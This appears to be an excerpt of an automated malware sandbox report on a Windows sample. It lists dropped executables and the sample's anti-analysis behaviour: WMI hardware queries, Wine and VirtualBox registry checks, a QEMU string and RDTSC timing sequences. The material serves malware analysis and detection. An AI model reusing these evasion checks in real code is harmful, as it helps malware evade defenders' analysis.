Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\1000238002\Amadeus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000026C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\]Q
Source: pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000026C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,]Q
Source: pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000026C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 81F13A second address: 81F15D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8D15422259h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 987037 second address: 987050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE0Fh 0x00000007 js 00007F8D1541FE18h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9930EF second address: 9930F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 99322E second address: 993232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 993232 second address: 993258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Fh 0x00000007 jmp 00007F8D1542224Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 993258 second address: 99326E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F8D1541FE0Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9933E6 second address: 99340A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Ch 0x00000007 jp 00007F8D1542224Ah 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jc 00007F8D15422246h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 99340A second address: 993418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8D1541FE06h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 9935C1 second address: 9935D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D15422251h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 993703 second address: 993711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 ja 00007F8D1541FE06h 0x0000000d pop ecx 0x0000000e rdtsc
